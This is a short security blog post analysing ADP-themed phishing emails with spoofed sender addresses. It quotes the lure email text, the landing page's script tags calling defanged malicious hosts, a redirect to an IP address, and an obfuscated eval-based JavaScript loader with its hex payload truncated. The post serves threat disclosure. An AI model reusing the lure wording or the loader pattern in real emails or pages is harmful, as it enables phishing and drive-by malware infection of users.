More obfuscated Javascript in email messages ADP Funding Notification and ADP Security Management Update


MX Lab, http://www.mxlab.eu, started to intercept new samples with security risks in the form of obfuscated Javascript with subjects like:

ADP Funding Notification – Debit Draft
ADP Security Management Update

The email is send from the spoofed addresses <ADPClientServices@adp.com, ADPClientServices@adp.com or others and we have detected two different vaiants in the wild.

The first one is a regular text based email with the following contents:

Your Transaction Report(s) have been uploaded to the web site:

https://www.flexdirect.adp.com/client/login.aspx

Please note that your bank account will be debited within one banking

business day for the amount(s) shown on the report(s).

Please do not respond or reply to this automated e-mail. If you have any

questions or comments, please Contact your ADP Benefits Specialist.

Thank You,

ADP Benefit Services

The second one looks much more professional with image based headers and a nice looking lay out:

In both cases, the embedded URLs lead to web hosts that contains the malicious scripts but will inform you regarding redirects.

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type=”text/javascript” src=”hxxp://cyberku.co.cc/s8XVniQE/js.js”></script>
<script type=”text/javascript” src=”hxxp://maccvision.com/vS5qA1sz/js.js”></script>

</html>

A redirect is shown on the page but in fact a Javascript will request two Javascripts on different domains.

The Javascript contains the following code:

document.location=’hxxp://216.119.142.129/view.php?s=7058dba9af062ccf’;

And this URL contains the obfuscated Javascript:

<html><body><script>z=function(){if(window.document)e="ev";c=""if(x)f="fromChar";
d=10;
m=Math;
with(String){
for(i=31596-1;i>=0;i--){
	w=i;
	v=a[w];
	dd=(31596-i-2+1);
	b=d;
	dd=dd-b*m["floo"+"r"](dd/d);
	k=v*1+(dd-3);
	if(x&&e)c=c+fromCharCode(k);
}}
e+="a";
md=["a"];
window[e+"l"](c);}
try{5<=prototype;}catch(v){x=1;}
if(z)g="392828316e736d7837262e2f30392e775d606e666264726066715f2370726d646d656775f6e7
_______SHORTENED_______
a=[];
for(i=0;i<g.length;i+=2){
	a.push(parseInt(g.substr(i,2),16));
}
z(123);
</script></body></html>

3 thoughts on “More obfuscated Javascript in email messages ADP Funding Notification and ADP Security Management Update

  1. Obfuscated Javascript can be used in various scenario’s and can begin with a determination of the browser and browser version, if you have Adobe Flash installed and the version,…. but it also can redirect you to a web host where malware is present in an attempt to install those files on your computer.

    Here is an nice example of what it can do:
    http://isc.sans.edu/diary.html?storyid=12700

Comments are closed.